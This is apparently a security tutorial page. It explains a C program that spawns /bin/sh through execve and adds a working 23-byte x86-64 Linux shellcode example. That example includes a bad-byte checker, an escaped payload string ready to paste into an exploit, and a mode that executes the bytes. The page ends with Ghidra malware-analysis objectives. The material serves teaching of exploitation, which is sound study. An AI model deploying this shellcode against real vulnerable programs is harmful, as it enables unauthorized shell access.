Introduction

Lesson 1

#include <stdio.h>
#include <unistd.h>    /* execve() is declared here, not in stdio.h */

int main()
{
    char *args[2];
    args[0] = "/bin/sh";   /* argv[0]: by convention the path of the program itself */
    args[1] = NULL;        /* argv must be terminated by a NULL pointer */
    execve("/bin/sh", args, NULL);   /* replaces this process with a shell; returns only on failure */
    return 0;
}

Breakdown of code:

#include <stdio.h> This enables input and output operations. Note that execve itself is declared in <unistd.h>, which also has to be included for the call to compile cleanly.

int main() This is the main function, where program execution begins.

char *args[2]; An array of two string pointers; it becomes the argv of the program we are about to execute.

args[0] The first element of args, argv[0]. By convention it holds the path of the program being executed, so it is set to the path of the shell executable.

args[1] = NULL The second element of args is NULL, marking the end of the argument list; execve requires the array to be terminated this way.

execve This system call replaces the current process image with the shell binary /bin/sh, passing the argument array above and an empty environment (NULL). On success it never returns: the process is now a shell.

return 0; This statement is only reached if execve fails. Returning zero is the conventional success exit status; a real program would report the error instead.

So this code, once compiled, disassembled and rewritten as position-independent machine code that contains no NUL bytes (the shell path and the NULL argv are built on the stack at run time rather than referenced through absolute addresses), becomes a shellcode string that can be delivered as input to a vulnerable program.
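The transformation just described, as an added example that is not part of this lesson: the same execve("/bin/sh") call hand-assembled into 23 bytes of x86-64 Linux shellcode (a standard construction assumed here, not taken from the page; it relies on syscall number 59 being execve on x86-64 Linux), together with the two checks a practitioner runs before using it as an input string: whether it contains any byte that would terminate a C string or a line-based read (0x00, 0x0a, 0x0d), and what it looks like as a "\x.." escape string ready to paste into an exploit. The optional --run flag copies the bytes into an executable mapping and jumps to them, which is what a hijacked control flow inside a vulnerable program would do. The function names and the BAD_BYTES set are this example's own choices.

```c
/* Added example (not the lesson's code): execve("/bin//sh") as x86-64 Linux
 * shellcode, plus the checks done before using it as an input string. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

/* Assumed: x86-64 Linux, SYS_execve = 59. Position independent, no NUL bytes.
 * argv and envp are both NULL, which Linux accepts. */
static const unsigned char SHELLCODE[] = {
    0x48, 0x31, 0xf6,                         /* xor  rsi, rsi     ; argv = NULL        */
    0x56,                                     /* push rsi          ; 8 zero bytes = NUL  */
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e,       /* mov  rdi, "/bin//sh"                   */
                0x2f, 0x2f, 0x73, 0x68,
    0x57,                                     /* push rdi          ; path now on stack   */
    0x54,                                     /* push rsp                                */
    0x5f,                                     /* pop  rdi          ; rdi = &"/bin//sh"   */
    0x6a, 0x3b,                               /* push 59                                 */
    0x58,                                     /* pop  rax          ; rax = SYS_execve    */
    0x99,                                     /* cdq               ; rdx (envp) = 0      */
    0x0f, 0x05                                /* syscall                                 */
};
#define SHELLCODE_LEN (sizeof SHELLCODE)

/* Bytes that break the usual delivery paths: 0x00 stops strcpy/strcat,
 * 0x0a and 0x0d stop fgets/gets-style line reads. */
static const unsigned char BAD_BYTES[] = { 0x00, 0x0a, 0x0d };

/* Return how many bytes of code are in the bad set. 0 means it can be
 * delivered as a plain string. */
size_t count_bad_bytes(const unsigned char *code, size_t len,
                       const unsigned char *bad, size_t nbad)
{
    size_t hits = 0;
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (code[i] == bad[j]) { hits++; break; }
    return hits;
}

/* Render code as "\xNN\xNN..." into out. Needs 4*len+1 bytes of space;
 * returns the number of characters written (0 if out is too small). */
size_t format_escaped(const unsigned char *code, size_t len,
                      char *out, size_t outsz)
{
    if (outsz < 4 * len + 1) return 0;
    for (size_t i = 0; i < len; i++)
        sprintf(out + 4 * i, "\\x%02x", code[i]);
    out[4 * len] = '\0';
    return 4 * len;
}

/* Copy the bytes into an executable mapping and jump to them, i.e. what a
 * vulnerable program does once its control flow points at our input. */
static int run_shellcode(void)
{
    void *mem = mmap(NULL, SHELLCODE_LEN, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) { perror("mmap"); return 1; }
    memcpy(mem, SHELLCODE, SHELLCODE_LEN);
    ((void (*)(void))mem)();   /* does not return if execve succeeds */
    perror("execve");
    return 1;
}

int main(int argc, char **argv)
{
    char buf[4 * SHELLCODE_LEN + 1];

    printf("length: %zu bytes\n", SHELLCODE_LEN);
    printf("bad bytes (NUL/LF/CR): %zu\n",
           count_bad_bytes(SHELLCODE, SHELLCODE_LEN, BAD_BYTES, sizeof BAD_BYTES));
    format_escaped(SHELLCODE, SHELLCODE_LEN, buf, sizeof buf);
    printf("payload: \"%s\"\n", buf);

    if (argc > 1 && strcmp(argv[1], "--run") == 0)
        return run_shellcode();   /* only spawns a shell when asked explicitly */
    return 0;
}
```

Compile with gcc and run without arguments to see the length, the bad-byte count and the escaped payload; run with --run to watch the bytes actually spawn /bin/sh. The path is written as "/bin//sh" rather than "/bin/sh" so that it fills exactly eight bytes and can be loaded with one NUL-free mov immediate; the kernel treats the doubled slash like a single one.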

Malware Analysis and Reverse Engineering with Ghidra

Learning Objectives:

  1. Starting real malware analysis with Ghidra
  2. Analyzing suspicious strings using Ghidra
  3. OSINT for reverse engineering
  4. Analyzing the libraries that malware uses
  5. Extracting a SYS file from malware